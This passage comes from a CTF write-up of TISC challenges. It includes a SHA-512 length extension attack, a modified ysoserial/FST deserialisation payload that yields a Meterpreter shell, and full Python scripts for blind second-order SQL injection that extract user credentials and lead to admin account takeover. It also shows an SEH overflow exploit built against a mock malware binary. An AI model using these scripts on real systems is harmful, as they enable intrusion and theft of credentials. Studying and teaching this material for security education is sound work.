In order to forge my own arbitrary cake data, I needed to pass this check. I found a great Dragon CTF 2019 writeup that covered a similar challenge involving protobuf-serialised data and an MD5 hash verification. However, while MD5 collisions are easy to create, this application used SHA-512 which would be impossible in theory to brute force or collide – not that it stopped me from trying. After many fruitless attempts at cracking the hash, I pondered the challenge description again. “Things that don't make logical sense can safely be ignored” clearly warned me against taking on the impossible like cracking SHA-512. But what did “Sometimes the end of a tale might not be the end of the story” mean?
After several more hours of aimless wandering, I found a StackExchange discussion about breaking SHA-512. One of the answers struck me:
Are there any successful attacks out there?
No, except length extension attacks, which are possible on any unaltered or extended Merkle-Damgard hash construction (SHA-1, MD5 and many others, but not SHA-3 / Keccak). If that's a problem depends on how the hash is used. In general, cryptographic hashes are not considered broken just because they suffer from length extension attacks.
Length extension attacks... “Sometimes the end of a tale might not be the end of the story”... I facepalmed for probably the hundredth time in the competition.
The application prepended a salt (the secret
variable) to the base64-encoded cake data, then generated a SHA-512 hash of the concatenated string. Furthermore, the source code revealed the length of secret
:
public static byte[] get_secret() throws IOException {
// Read the secret from /home/hatter/secret.
byte[] data = FileUtils.readFileToByteArray(new File("/home/hatter/secret"));
if (data.length != 32) {
System.out.println("Secret does not match the right length!");
}
return data;
}
This was a classic setup for a hash extension attack. I won't re-hash the explanation – there is a hash_extender
repository on GitHub that breaks down this attack. Even better, it includes a tool to perform the hash extension attack on several hash algorithms, including SHA-512. Thanks, Ron Bowes!
I generated a test payload to append candle = 1
in Protobuf format to the data I had previously exported using the Cake to Go
function.
> hash_extender/hash_extender -l 32 -d CgAQACIA -s <ORIGINAL HASH> -f sha512 -a EAE=
> <FORGED MESSAGE DIGEST>
I tested the modified JSON by importing it into the application using the Go to Cake
function.
Please enter your saved cake: {"cake":"<CAKE DATA>","digest":"<DIGEST>"}
{"cake":"<CAKE DATA>","digest":"<DIGEST>"}
Cake successfully gotten!
[Cake Designer Interface v4.2.1]
1. Set Name.
2. Set Candles.
3. Set Caption.
4. Set Flavour.
5. Add Firework.
6. Add Decoration.
7. Cake to Go.
8. Go to Cake.
9. Eat Cake.
0. Leave the Party.
[Your cake so far:]
name: ""
candles: 1
flavour: ""
Great success!
After confirming that the hash length extension attack allowed me to forge my own cake data, I moved on to generate a deserialisation payload. ysoserial
appeared to be the obvious tool of choice, but according to the pom.xml
manifest, the application only imported commons-beanutils
whereas the ysoserial
CommonsBeanutils1
payload required commons-beanutils:1.9.2, commons-collections:3.1, commons-logging:1.2
. Fortunately, after checking some of the pull requests for the repository, I discovered one that removed the additional dependencies. Pumped with excitement, I cloned the repo, modified the code based on the pull request, generated my payload, and sent my hash-extended data. It didn't work.
Checking the error messages, I realised to my horror that the application did not use the standard ObjectInputStream
deserialisation. Instead, it was using the FST library to serialise and deserialise payloads and thus required a completely different serialisation format. To get the ysoserial
payload to work, I modified the tool's source code in GeneratePayload.java
to use FST instead of ByteArrayOutputStream
.
public class GeneratePayload {
private static final int INTERNAL_ERROR_CODE = 70;
private static final int USAGE_CODE = 64;
static FSTConfiguration conf = FSTConfiguration.createDefaultConfiguration();
...
try {
final ObjectPayload payload = payloadClass.newInstance();
final Object object = payload.getObject(command);
PrintStream out = System.out;
byte[] payload_data = conf.asByteArray(object);
FileOutputStream outputStream = new FileOutputStream("payload.hex");
outputStream.write(payload_data);
I re-compiled ysoserial
, generated my payload, and sent it off. However, it crashed again when entering my JSON payload. What went wrong? Looking at the error messages, I realised that the program cut off my input at 4096 bytes. This was because the code used scanner.nextLine()
to accept input, which was limited to 4096 bytes at a time. At my wits' end, I made a last-ditch attempt by port forwarding the application via my Meterpreter shell, then used pwntools
to send the input directly instead of copying and pasting my payload.
from pwn import *
## p = process(['java', '-jar','opt/wonderland/a-mad-tea-party/tea-party/target/tea-party-1.0-SNAPSHOT.jar'])
p = remote('<IP ADDRESS>', 4445)
print(p.recvuntil("Invitation Code:"))
p.sendline(b'<INVITATION CODE>')
print(p.recvuntil("Choice:"))
p.sendline(b'8')
p.sendline(b'{"cake":"<CAKE DATA>","digest":"<DIGEST>"}')
p.interactive()
To my huge relief, it worked and I got my Meterpreter shell! I was finally at the end of this long rabbit hole. Take a bow!
TISC{W3_y4wN_A_Mor3_r0m4N_w4y}
Level 10: Malware for UwU
Domains: Web, Binary Exploitation (Windows Shellcoding), Reverse Engineering, Cryptography
We've found a PALINDROME webserver, suspected to be the C2 Server of a newly discovered malware! Get the killswitch from the bot masters before the malware goes live!
May the Force (not brute force) be with UwU!
The final countdown! I headed to the website which featured a simple login page.
I could register as a user without any problems.
After registering, I logged in to a simple dashboard.
The beautiful bird image was in fact a huge series of styled <span>
elements.
<span class="ascii" style="display:inline-block;white-space:pre;letter-spacing:0;line-height:1;font-family:'BitstreamVeraSansMono','CourierNew',Courier,monospace;font-size:16px;border-width:1px;border-style:solid;border-color:lightgray;">
<span style="background-color:#d7875f;color: #d7af87;">|</span>
<span style="background-color:#d7875f;color: #af5f00;">|</span>
<span style="background-color:#d7875f;color: #af5f00;">|</span><
...
</span>
Since the original domain description for this level omitted Web, I suspected this was a Cryptography challenge and got tangled up trying to analyse the hexadecimal colour values. After several fruitless hours, I clarified this with the organisers and they corrected the domain list to include Web. This prompted me to look for Web attack vectors instead. The “Contact your PALINDROME admin for further instructions!” text suggested that an admin user account existed so I began looking for a possible SQL injection. At first, I thought that the login form was vulnerable because sending %27+OR+%27
in the password
field caused the response to drop. However, I eventually decided that this was a deliberate red herring because %27+OR++%27
, which should have been interpreted the same as %27+OR+%27
in SQL syntax, did not drop the response.
Moving on, I noticed something interesting when I added a single quote to all of the form values while registering a new user.
POST /new_user.php HTTP/1.1
Host: <IP ADDRESS>:18080
Content-Length: 146
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://<IP ADDRESS>:18080
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.44
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
username=johndoe'&password=johndoe'&recovery_q1=Q1'&recovery_a1=johndoe'&recovery_q2=Q2'&recovery_a2=johndoe'&recovery_q3=Q4'&recovery_a3=johndoe'
When I tried to reset the user's password with recovery questions, the password reset self-service correctly fetched the user but failed to fetch any of the recovery questions.
This suggested that an SQL injection had occurred in the SQL statement fetching the user's recovery questions. I guessed that the statement partly resembled select question_text from recovery_questions where recovery_id = '<UNSANITISED VALUE OF recovery_q1 FROM REGISTRATION>'
. As such, I could exploit a two-step SQL injection by signing up with the SQL payload in the recovery_q1
parameter, then retrieving the result at the user's password reset page. Unfortunately, after further testing I discovered that the application ran a filter on UNION
in my payload that prevented me from directly leaking additional strings; all UNION
payloads failed even though typical ' AND '1'='1
injections worked. Furthermore, the SELECT INTO OUTFILE
remote code execution vector also failed. Instead, I relied on boolean-based output. If my injected statements evaluated to true, the password reset page would correctly fetch the user's recovery question text. If they evaluated to false, the recovery question text would be missing.
This required massive numbers of registration and password reset requests, forcing me to automate my SQL injection. I used GUIDs for the usernames to avoid collisions in registration. My first order of business was to enumerate the table names. I leaked the number of tables and then retrieved the names of the last few tables to ensure that they were user-created rather than system tables.
import requests
import uuid
import string
NEW_USER_URL = 'http://<IP ADDRESS>:18080/new_user.php'
FORGOT_PASSWORD_URL = 'http://<IP ADDRESS>:18080/forgot_password.php'
CANDIDATE_LETTERS = string.printable
## Get number of tables
## 63
## appdb
def leak_table_count():
count = 0
found = False
while not found:
username = uuid.uuid4().hex
payload = {
'username': username,
'password': username,
'recovery_q1': 'Q1',
'recovery_a1': username,
'recovery_q2': 'Q2',
'recovery_a2': username,
'recovery_q3': 'Q3',
'recovery_a3': username
}
payload['recovery_q1'] = "Q1' AND ((SELECT COUNT(*) from information_schema.tables)='{}')#".format(count)
r = requests.post(NEW_USER_URL, data=payload)
# print(r.text)
if 'New UwUser registered!' in r.text:
print("CREATED USER WITH PAYLOAD {}".format(payload))
else:
print("FAILED TO CREATE USER WITH PAYLOAD {}".format(payload))
exit(-1)
r = requests.post(FORGOT_PASSWORD_URL, data={'username': username})
if 'What was the name of your best frenemy in the Palindrome Academy?' in r.text:
print("CANDIDATE SUCCESS")
found = True
else:
print("CANDIDATE FAILED")
# exit(-1)
count += 1
print("Number of tables: {}".format(count))
## Get table name (start from last few tables to get user tables)
## innodb_sys_tablestats, qnlist, userlist
def leak_table_name(table_number):
table_name = ''
found = True
while found:
found = False
for candidate_letter in CANDIDATE_LETTERS:
username = uuid.uuid4().hex
payload = {
'username': username,
'password': username,
'recovery_q1': 'Q1',
'recovery_a1': username,
'recovery_q2': 'Q2',
'recovery_a2': username,
'recovery_q3': 'Q3',
'recovery_a3': username
}
payload['recovery_q1'] = "Q1' AND (SUBSTRING((SELECT table_name from information_schema.tables LIMIT {}, 1), 1, {})) = BINARY '{}'#".format(table_number, len(table_name) + 1, table_name + candidate_letter)
r = requests.post(NEW_USER_URL, data=payload)
# print(r.text)
if 'New UwUser registered!' in r.text:
print("CREATED USER WITH PAYLOAD {}".format(payload))
else:
print("FAILED TO CREATE USER WITH PAYLOAD {}".format(payload))
exit(-1)
r = requests.post(FORGOT_PASSWORD_URL, data={'username': username})
if 'What was the name of your best frenemy in the Palindrome Academy?' in r.text:
print("CANDIDATE SUCCESS")
found = True
table_name += candidate_letter
print(table_name)
break
else:
print("CANDIDATE FAILED")
print(table_name)
Now that I had the table names qnlist
and userlist
, I retrieved their column names.
## Get concatted column names for the table
## username,pwdhash,usertype,email,recover_q1,recover_a1,recover_q2,recover_a2,recover_q3,recover_a3
## q_tag, q_body
def leak_column_names(table_name):
column_names = ''
found = True
while found:
found = False
for candidate_letter in CANDIDATE_LETTERS:
username = uuid.uuid4().hex
payload = {
'username': username,
'password': username,
'recovery_q1': 'Q1',
'recovery_a1': username,
'recovery_q2': 'Q2',
'recovery_a2': username,
'recovery_q3': 'Q3',
'recovery_a3': username
}
payload['recovery_q1'] = "Q1' AND (SUBSTRING((SELECT group_concat(column_name) FROM information_schema.columns WHERE table_name = '{}'), 1, {})) = BINARY '{}'#".format(table_name, len(column_names) + 1, column_names + candidate_letter)
r = requests.post(NEW_USER_URL, data=payload)
# print(r.text)
if 'New UwUser registered!' in r.text:
print("CREATED USER WITH PAYLOAD {}".format(payload))
else:
print("FAILED TO CREATE USER WITH PAYLOAD {}".format(payload))
exit(-1)
r = requests.post(FORGOT_PASSWORD_URL, data={'username': username})
if 'What was the name of your best frenemy in the Palindrome Academy?' in r.text:
print("CANDIDATE SUCCESS")
found = True
column_names += candidate_letter
print(column_names)
break
else:
print("CANDIDATE FAILED")
print(column_names)
usertype
suggested that there indeed existed an admin user in the database. I began retrieving all of the users' data.
## Leaks user data (only leak essential columns to takeover)
## TeoYiBoon,3043b513222221993f7ade356f521566,0,[email protected],Q2,Dirty Gorilla,Q6,Mark Zuckerberg,Q7,Fox
## oscarthegrouch,3043b513244444993f7ade356f521566,0,[email protected],Q3,cat recycle bin,Q4,Operation Garbage Can,Q5,5267385
## barney,3043b513244555993f7ade356f521566,0,[email protected],Q1,Major Planet,Q4,Operation Garbage Can,Q7,Purple dinosaur
## rollrick,3043b513244556993f7ade356f521566,0,[email protected],Q2,Rick n Roll,Q3,Operation RICKROLL,Q6,PICKLE RICKKKK
## noobuser,3043b513111111993f7ade356f521566,0,[email protected],Q1,Boba Abob,Q2,Eternal Fuchsia,Q3,Troll your buddy
def leak_user_data(user_number):
user_data = ''
found = True
while found:
found = False
for candidate_letter in CANDIDATE_LETTERS:
username = uuid.uuid4().hex
payload = {
'username': username,
'password': username,
'recovery_q1': 'Q1',
'recovery_a1': username,
'recovery_q2': 'Q2',
'recovery_a2': username,
'recovery_q3': 'Q3',
'recovery_a3': username
}
# CONCAT(username,',',usertype,',',email,',',recover_a1,',',recover_a2,',',recover_a3)
# payload['recovery_q1'] = "Q1' AND (SUBSTRING((SELECT CONCAT(HEX(recover_a1),',',HEX(recover_a2),',',HEX(recover_a3)) from userlist LIMIT {}, 1), {}, 1)) = BINARY '{}'#".format(user_number, len(user_data) + 1, candidate_letter) # for my boy c1-admin
payload['recovery_q1'] = "Q1' AND (SUBSTRING((SELECT CONCAT(recover_a1,',',recover_q2,',',recover_a2,',',recover_q3,',',recover_a3) from userlist LIMIT {}, 1), {}, 1)) = BINARY '{}'#".format(user_number, len(user_data) + 1, candidate_letter)
r = requests.post(NEW_USER_URL, data=payload)
# print(r.text)
# if 'New UwUser registered!' in r.text:
# print("CREATED USER WITH PAYLOAD {}".format(payload))
if not 'New UwUser registered!' in r.text:
# print("FAILED TO CREATE USER WITH PAYLOAD {}".format(payload))
exit(-1)
r = requests.post(FORGOT_PASSWORD_URL, data={'username': username})
if 'What was the name of your best frenemy in the Palindrome Academy?' in r.text:
# print("CANDIDATE SUCCESS: {}".format(ord(candidate_letter)))
found = True
user_data += candidate_letter
print(user_data)
break
# else:
# print("CANDIDATE FAILED")
# break
print(user_data)
I needed to HEX
the fetched user's data because when my script reached the juicy laojiao-c2admin
user, it exited early on recovery answer 2, returning X
. I suspected that there was some kind of special character in the way. Indeed, the user's answer to What is the name of an up and coming evil genius that inspires you?
turned out to be X Æ A-12
. Along the way, I modified my script to leak a few additional values and confirmed that the current examdbuser@localhost
user lacked FILE
permissions. Additionally, I found out that the application sanitised union
to onion
and sleep
to sheep
. Eventually, I finished extracting the admin user's data: laojiao-c2admin,1,[null],6-235-35-35,X Æ A-12,Nat Uwu Tan
.
I successfully reset laojiao-c2admin
's password using the recovery answers and logged in. This time, I encountered the same dashboard with an important change at the bottom – instead of “Contact your PALINDROME admin for further instructions!”, there was a link to download a binary named UwU.exe
!
I downloaded UwU.exe
and attempted to execute it, but it exited immediately. I opened it in PE-bear and noticed that the .text
and .data
sections had been replaced by .MPRESS1
and .MPRESS2
I Googled this and found out that this was an indicator that the executable had been packed by the MPRESS packer. There were several tutorials online that described how to manually unpack such executables, but I wanted to try some automated options first. Here's a list of the ones I used.
- Avast RetDec: Failed to recognise the MPRESS packing.
- unipacker: Managed to unpack but set the original entry point too early so the executable crashed.
- QuickUnpack: The OG unpacker. It was difficult to find a working copy and I had to download it in a hermetically sealed VM and take a shower afterwards. Unsurprisingly, this was the only unpacker that worked perfectly.
With the unpacked UwU.exe
, I could now easily decompile and debug it.
I executed the binary and was blasted by the song of my people.
Right away, I tried the “Display Killswitch” option and enjoyed another sweet, sweet lullaby but no killswitch flag.
Next, I ran the “Register Bird” option, which prompted me for an IP address and port. I set this to the website's IP address and port and successfully registered. Additionally, this triggered a HTTP request that I retrieved using WireShark.
POST /register.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: UwUserAgent/1.0
Content-Length: 60
Host: <IP ADDRESS>:18080
action=register&a=roVwGx&b=gD4ZuM&c=pFvulv&d=XH2CPq&e=I3Yonk
HTTP/1.1 200 OK
Date: Mon, 15 Nov 2021 16:33:53 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Length: 48
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
oVSFHfzJoQSfTP3PphqGSf7Lug+HTfrSrwHXRv2c9ATWGfma
Next, I selected “Send Message” which accepted a target UwUID and message before sending another HTTP request.
POST /send.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: UwUserAgent/1.0
Content-Length: 28
Host: <IP ADDRESS>:18080
action=send&a=ABCDEF&b=HELLO
HTTP/1.1 200 OK
Date: Mon, 15 Nov 2021 16:35:34 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Finally, I tested “Receive Messages” which continuously sent the following HTTP request every few seconds.
POST /receive.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: UwUserAgent/1.0
Content-Length: 56
Host: <IP ADDRESS>:18080
UwUID=oVSFHfzJoQSfTP3PphqGSf7Lug%2bHTfrSrwHXRv2c9ATWGfma
I also popped the executable into VirusTotal and ANY.RUN to observe more static or dynamic behaviour but did not glean anything new. I moved on to reverse engineering the unpacked executable, starting with the register function.
The binary featured many dead ends. For example, it included unreachable code like this.
switch ( rand() % 5 ) // actually, none of these will happen right? can safely ignore
{
case 44:
display_logo();
break;
case 88:
display_killswitch();
break;
case 132:
sub_557571D0(v39, e_flat);
sub_55752C60(v39[0], (int)v39[1], (int)v39[2], (int)v39[3], (int)v39[4], v40);
break;
case 176:
receive_messages(v41);
break;
case 220:
register_bird(v41);
break;
case 264:
send_message(v41);
break;
default:
break;
Additionally, the binary used very few plaintext strings, preferring to decrypt them dynamically. For example, the following function returned the value “Not registered”:
void __thiscall sub_557574E0(_BYTE *this)
{
unsigned int v1; // ebx
unsigned int v2; // esi
if ( this[15] )
{
v1 = 0;
v2 = 0;
do
{
this[v2] ^= 0x5AA5D2B4D39B2B69ui64 >> (8 * (v2 & 7));
v1 = (__PAIR64__(v1, v2++) + 1) >> 32;
}
while ( __PAIR64__(v1, v2) < 0xF );
this[15] = 0;
}
}
I decrypted these dynamically by setting breakpoints at the ret
instruction and dumping EAX
.
The first question I wanted to answer was how the binary generated the seemingly random a
, b
, c
, d
, and e
parameters in the POST /register.php
request. I found the obfuscated loop further down in the main
function.
for ( j = 9; ; j = 1401 )
{
while ( j <= 18 )
{
if ( j == 18 )
{
v34 = mersenne_rng_with_b62(v44); // generate b parameter
sub_55757100(v34);
if ( v46 >= 0x10 )
{
v31 = v44[0];
v32 = v46 + 1;
if ( v46 + 1 >= 0x1000 )
{
v31 = *(_DWORD *)(v44[0] - 4);
v32 = v46 + 36;
if ( (unsigned int)(v44[0] - v31 - 4) > 0x1F )
goto LABEL_66;
}
v40 = v32;
sub_5575B048(v31);
}
j = 4;
}
else if ( j == 4 )
{
v33 = mersenne_rng_with_b62(v44); // generate c parameter
sub_55757100(v33);
if ( v46 >= 0x10 )
{
v31 = v44[0];
v32 = v46 + 1;
if ( v46 + 1 >= 0x1000 )
{
v31 = *(_DWORD *)(v44[0] - 4);
v32 = v46 + 36;
if ( (unsigned int)(v44[0] - v31 - 4) > 0x1F )
goto LABEL_66;
}
v40 = v32;
sub_5575B048(v31);
}
j = 64;
}
else
{
v30 = mersenne_rng_with_b62(v44); // generate a parameter
sub_55757100(v30);
if ( v46 >= 0x10 )
{
v31 = v44[0];
v32 = v46 + 1;
if ( v46 + 1 >= 0x1000 )
{
v31 = *(_DWORD *)(v44[0] - 4);
v32 = v46 + 36;
if ( (unsigned int)(v44[0] - v31 - 4) > 0x1F )
goto LABEL_66;
}
v40 = v32;
sub_5575B048(v31);
}
j = 18;
}
}
if ( j != 64 )
break;
v36 = mersenne_rng_with_b62(v44); // generate d parameter
sub_55757100(v36);
if ( v46 >= 0x10 )
{
v31 = v44[0];
v32 = v46 + 1;
if ( v46 + 1 >= 0x1000 )
{
v31 = *(_DWORD *)(v44[0] - 4);
v32 = v46 + 36;
if ( (unsigned int)(v44[0] - v31 - 4) > 0x1F )
goto LABEL_66;
}
v40 = v32;
sub_5575B048(v31);
}
}
v35 = mersenne_rng_with_b62(v44); // generate e parameter
Each parameter was 6 characters selected using a Mersenne Twister pseudo-random number generator algorithm from the base62 alphabet in the mersenne_rng_with_b62
function.
_DWORD *__usercall mersenne_rng_with_b62@<eax>(_DWORD *a1@<ecx>, int a2@<edi>, int a3@<esi>)
{
_EXCEPTION_REGISTRATION_RECORD *v3; // eax
void *v4; // esp
unsigned int seed; // eax
unsigned int i; // edx
int v8; // edi
int extracted_number; // eax
unsigned int v10; // edx
unsigned int v11; // ecx
_DWORD *v12; // eax
_BYTE *v13; // eax
char v14; // cl
int v17; // [esp+0h] [ebp-13CCh] BYREF
int v18[1259]; // [esp+4h] [ebp-13C8h]
int v19; // [esp+13B0h] [ebp-1Ch]
int v20; // [esp+13B4h] [ebp-18h]
char *base62_alphabet; // [esp+13B8h] [ebp-14h]
int v22; // [esp+13BCh] [ebp-10h]
_EXCEPTION_REGISTRATION_RECORD *v23; // [esp+13C0h] [ebp-Ch]
char *v24; // [esp+13C4h] [ebp-8h]
int v25; // [esp+13C8h] [ebp-4h]
v25 = -1;
v3 = NtCurrentTeb()->NtTib.ExceptionList;
v24 = byte_5575CBE6;
v23 = v3;
v4 = alloca(5056);
v18[1255] = (int)a1;
v20 = 0;
v18[1253] = 62;
base62_alphabet = (char *)operator new(0x40u);
v18[1254] = 63;
v18[1249] = (int)base62_alphabet;
strcpy(base62_alphabet, "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz");// base62
v25 = 1;
seed = std::_Random_device(a2, a3);
v18[1248] = -1;
i = 1;
v18[0] = seed;
do // Initialise the generator from a seed
{
seed = i + 1812433253 * (seed ^ (seed >> 30));// Initialise Mersenne Twister with constant 1812433253
v18[i++] = seed;
}
while ( i < 0x270 );
*a1 = 0;
a1[4] = 0;
a1[5] = 15;
*(_BYTE *)a1 = 0;
v17 = 624;
a1[4] = 0;
*(_BYTE *)a1 = 0;
v20 = 1;
v18[1256] = (int)&v17;
v8 = 6;
v18[1257] = 32;
v18[1258] = -1;
do
{
extracted_number = get_next_mod_62(62); // Retrieve next Mersenne PRNG number mod 62
v10 = a1[5];
v11 = a1[4];
LOBYTE(v22) = base62_alphabet[extracted_number]; // Used number as offset in base62 alphabet
if ( v11 >= v10 )
{
LOBYTE(v19) = 0;
sub_557595E0(v11, v19, v22);
}
else
{
a1[4] = v11 + 1;
v12 = a1;
if ( v10 >= 0x10 )
v12 = (_DWORD *)*a1;
v13 = (char *)v12 + v11;
v14 = v22;
v13[1] = 0;
*v13 = v14;
}
--v8;
}
while ( v8 );
sub_5575B048(base62_alphabet);
return a1;
}
I recognised the Mersenne Twister due to the presence of constants such as 1812433253
. At this point, I fell down another hilarious rabbit hole. Apparently, the constants used by the program's Mersenne Twister matched those used to encrypt several Japanese game files. This led me to a game modder's decryption script that included the following comment:
UwU indeed. I burned a few more hours chasing this false lead due to my faith in a fellow man of culture. Ultimately, I decided that the program only used the Mersenne Twister to generate random characters and nothing more.
Since these values were indeed (pseudo)randomly generated, perhaps it served as an encryption key for future communications with the server, a common pattern used by C2 frameworks. I tried base62-decrypting the parameters but only got gibberish. Next, I recalled that the dashboard on the website provided five master UwUIDs:
Here is a list of Bot Master UwUIDs:
- 715cf1a6-c0de-4a55-b055-c0ffeec0ffee
- 715cf1a6-baba-4a55-b0b0-c0ffeec0ffee
- 715cf1a6-510b-4a55-ba11-c0ffeec0ffee
- 715cf1a6-dead-4a55-a1d5-c0ffeec0ffee
- 715cf1a6-51de-4a55-be11-c0ffeec0ffee
However, these UwUIDs looked different from the UwUID returned from the registration HTTP request, such as oVSFHfzJoQSfTP3PphqGSf7Lug%2bHTfrSrwHXRv2c9ATWGfma
. This base64 string decoded to 36 bytes – the same number of bytes as the Bot Master UwUIDs in plaintext.
Perhaps the base64 string was simply an encoded version of a plaintext UwUID matching the pattern <4 HEX BYTES>-<2 HEX BYTES>-<2 HEX BYTES>-<2 HEX BYTES>-<6 HEX BYTES>
. How could I decrypt them though?
I began fuzzing the POST /register.php
request with different parameters. I noticed after a while that if I kept the parameters the same but kept repeating the request, I would eventually get the same encrypted UwUID again. Furthermore, after fuzzing too many times, I somehow crashed the encrypted UwUID generator (the organisers had to reset it) and began receiving only MDAwMDA=
, which base64-decoded to 00000
.
After many failed attempts, I began to wonder if I missed some crucial information. Since I downloaded the binary from http://<IP ADDRESS>:18080/super-secret-palindrome-long-foldername/UwU.exe
, I began fuzzing http://<IP ADDRESS>:18080/super-secret-palindrome-long-foldername/<FUZZ>
. As it turned out, http://<IP ADDRESS>:18080/super-secret-palindrome-long-foldername/
was a simple directory listing that included README.txt
.
I opened the README and found out what I had been missing.
Congratulations, PALINDROME Member! You are now a proud UwUser of our latest malware, UwU.exe!
Before running the malware on your victim, it is important that the victim is a soft target. Ie, the win10 exploit mitigations should be disabled first (see https://docs.microsoft.com/en-us/windows/security/threat-protection/overview-of-threat-mitigations-in-windows-10#table-2configurable-windows-10-mitigations-designed-to-help-protect-against-memory-exploits). Win 8.1 and below are all fair game!
Upon running the malware, you will see several options. Namely:
Register Bird
Send Message
Receive Messages
Display Killswitch
Exit
You should first register the malware (the Bird) with the C2 Server (the Birdwatcher), which is a server such as this one.
After that, you can send and receive messages, to communicate with the other registered Birds! Simply send the message to their UwUIDs (which will be assigned to you upon registering).
Each C2 Server will have several Big Birds as bot masters, which are essentially an identical copy of the malware you've received, but with a special killswitch only available for the Big Birds.
Also, you do not need to worry if the bot masters are taken offline. They will restart and reconnect to the C2 Server automatically!
This clarified things for me. I could contact the bot masters by sending them a message, so perhaps I could send some kind of payload to gain control of them. I set up my own fake C2 server in Python to test this theory.
from http.server import HTTPServer, BaseHTTPRequestHandler
from struct import pack
## from http.server import SimpleHTTPRequestHandler
import datetime
port = 8081
payload = b'A' * 2000
class myHandler(BaseHTTPRequestHandler):
def do_POST(self):
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
# Send the html message
if self.path == '/register.php':
# self.wfile.write(b'A' * 100000)
self.wfile.write(
b'40K8avCKsxKhO6OJ4Am4bq3bqEW6PvfG5hfpPKLeskDqZPHc')
elif self.path == '/receive.php':
self.wfile.write(payload)
return
class StoppableHTTPServer(HTTPServer):
def run(self):
try:
self.serve_forever()
except KeyboardInterrupt:
pass
finally:
# Clean-up server (close socket, etc.)
self.server_close()
if __name__ == '__main__':
server = HTTPServer(('127.0.0.1', 8081), myHandler)
server.serve_forever()
I started the server and began receiving messages from my local UwU.exe
. However, nothing happened. WireShark told me that the messages were received by UwU.exe
, but for some reason it did not parse them. By debugging the program and reviewing the “Receive Messages” function in IDA, I discovered that it performed the following check after receiving the message:
if ( (_DWORD)v82 != 3
|| ((v46 = v6->m128i_i8[0] < 0x55u, v6->m128i_i8[0] != 85) // Check if first character is U
|| (second_char = v6->m128i_i8[1], v46 = (unsigned __int8)second_char < 0x77u, second_char != 119) // Check if second character is w
|| (third_char = v6->m128i_i8[2], v46 = (unsigned __int8)third_char < 0x55u, third_char != 85) ? (v49 = v46 ? -1 : 1) : (v49 = 0), // Check if third character is U
is_valid_message = 1,
v49) )
{
is_valid_message = 0;
}
if ( HIDWORD(v82) >= 0x10 )
{
v50 = HIDWORD(v82) + 1;
if ( (unsigned int)(HIDWORD(v82) + 1) >= 0x1000 )
{
v18 = *(_DWORD *)(v81.m128i_i32[0] - 4);
v50 = HIDWORD(v82) + 36;
if ( v81.m128i_i32[0] - v18 - 4 > 0x1F )
goto LABEL_141;
}
v66 = (__m128i *)v50;
sub_5575B048(v18);
}
if ( is_valid_message )
{
<COPY RESPONSE DATA TO BUFFER>
This meant that the message had to match the format UwU<MESSAGE>
. I corrected my server code and tried again. This time, I got a crash:
(3978.edc): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** WARNING: Unable to verify timestamp for C:\Users\Eugene\Desktop\tisc\10\UwU_unpacked.exe
eax=41414141 ebx=004854a0 ecx=41414141 edx=41414142 esi=0019fcb4 edi=000001ff
eip=55752d5a esp=0019fc80 ebp=0019fcac iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206
UwU_unpacked+0x2d5a:
55752d5a 8b49fc mov ecx,dword ptr [ecx-4] ds:002b:4141413d=????????
0:000> !exchain
0019fca0: 41414141
Invalid exception stack at 41414141
0:000> g
(3978.edc): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=41414141 edx=773985f0 esi=00000000 edi=00000000
eip=41414141 esp=0019f648 ebp=0019f668 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
41414141 ?? ???
I had triggered an SEH overflow, one of the easiest overflows to exploit. To add to my excitement, I determined that UwU.exe
did not include any memory protections like DEP or ASLR thanks to the MPRESS packer. I easily generated a local proof-of-concept to execute Meterpreter shellcode via the overflow in the message. First, I determined that the offset to the overwritten SEH address was 36. Next, I used a simple POP POP RET
payload with a JMP 0x08
instruction to get to my shellcode, just like in the basic tutorials. However, it was never going to be that easy. Even though the exploit worked locally, when I sent this to the bot master UwUIDs using the POST /send.php
endpoint, nothing happened.
After several more angst-filled hours and confirming with the organisers that the network was working properly, I decided that this was a dead end. The C2 endpoint seemed to be filtering my payloads but I could not find out how it was doing so unless I sent messages to my own instances using the real C2. That required an unencrypted UwUID.
I recalled that the base64-decoded encrypted UwUID had the same number of bytes as the unencrypted plaintext bot master UwUIDs – 36. This suggested that the C2 used a stream cipher because stream ciphers generate the ciphertext by XORing each byte of the plaintext against a keystream, creating a ciphertext of the same length as the plaintext. If the C2 used a block cipher like AES, the plaintext would be padded to the block size length before being encrypted, causing the length of the ciphertext to be greater than the length of the plaintext.
I began researching various ways to break stream ciphers from a black box perspective. Once again, Stack Overflow came to my rescue. One of the answers described a known-plaintext attack against RC4. If the encryption service used the same key each time it encrypted something, the keystream would be the same for all inputs. Since each ciphertext was simply the plaintext XOR keystream, I could retrieve the XOR of two plaintexts by XORing their ciphertexts.
KS = RC4(K)
C1 = KS XOR M1
C2 = KS XOR M2
C1 XOR C2 = (KS XOR M1) XOR (KS XOR M2) = M1 XOR M2
